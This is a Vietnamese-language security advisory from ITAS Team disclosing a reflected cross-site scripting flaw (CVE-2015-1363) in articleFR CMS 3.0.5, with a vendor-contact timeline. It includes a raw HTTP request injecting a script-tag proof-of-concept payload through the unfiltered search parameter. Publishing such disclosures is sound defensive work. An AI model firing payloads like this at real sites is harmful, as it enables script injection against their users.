ITAS Team phát hiện lỗ hổng XSS trong articleFR CMS

Cross-Site Scripting hay còn được gọi tắt là XSS (thay vì gọi tắt là CSS để tránh nhầm lẫn với CSS-Cascading Style Sheet của HTML) là một kĩ thuật tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP …) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML.
ArticleFR CMS sử dụng dữ liều của người dùng nhập vào từ biến q mà không có sự chặn lọc nào nên lỗ hổng XSS đã xảy ra. Các cá nhân và tổ chức có sử dụng CMS này nên chú ý và đưa ra biện pháp khắc phục.

Thông tin về lỗ hổng:
– Lỗ hổng: Reflected Cross-Site Scripting
– Nhà sản xuất: http://freereprintables.com
– Download link: https://github.com/articlefr/articleFR
– Phiên bản lỗi: version 3.0.5
– CVE ID: CVE-2015-1363
– Phát hiện bởi: Trần Đình Tiến (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)

Chi tiết về lỗ hổng:
GET /demo/search/v/?q=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1
Host: demo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.demo.com/demo/search/v/?q=%3Cscript%3Ealert%289999%29%3C%2Fscript%3E
Cookie: lhc_per={%22vid%22:%226dq7k8utakegpenguv2s%22}; _ga=GA1.2.1982695316.1420692931; __unam=ba3cbfe-14ac7e5c29b-63911eb3-7; PHPSESSID=207352ef26262a6aab50e55f77cda2f3; _gat=1
Connection: keep-alive

Công bố thông tin:
– 12/09/2014: Liên hệ nhà sản xuất, nhà sản xuất không phản hồi
– 12/11/2014: Liên hệ nhà sản xuất, nhà sản xuất không phản hồi
– 12/22/2014: Liên hệ nhà sản xuất, nhà sản xuất phản hồi
– 12/23/2014: Gửi thông tin chi tiết lỗi cho nhà sản xuất, nhà sản xuất không phản hồi
– 01/22/2015: Công bố thông tin

Tham khảo:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1363
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1363
http://seclists.org/fulldisclosure/2015/Jan/101
http://packetstormsecurity.com/files/130066/articleFR-CMS-3.0.5-Cross-Site-Scripting.html

/ Blog / Tags: , ,

Chia sẻ bài này